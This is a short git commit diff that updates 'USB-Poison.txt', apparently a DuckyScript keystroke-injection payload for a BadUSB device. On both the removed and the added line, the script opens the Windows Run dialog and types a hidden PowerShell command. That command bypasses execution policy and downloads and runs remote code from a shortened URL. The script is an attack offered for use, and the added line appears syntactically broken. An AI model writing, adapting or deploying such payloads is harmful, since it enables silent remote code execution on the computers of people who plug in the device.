Update USB-Poison.txt

This commit is contained in:
egieb
2024-07-22 11:14:50 +00:00
committed by GitHub
parent f08135eccc
commit d3bf23e72b

View File

@@ -11,6 +11,6 @@ REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $url = 'YOUR_FILE_URL_HERE'; irm is.gd/usbpoison | iex
STRING powershell -NoP -Ep Bypass -W H -C $DLurl = 'YOUR_FILE_URL_HERE'; $File = 'NAME_OF_FILE_TO_COPY' irm is.gd/usbpoison | iex
ENTER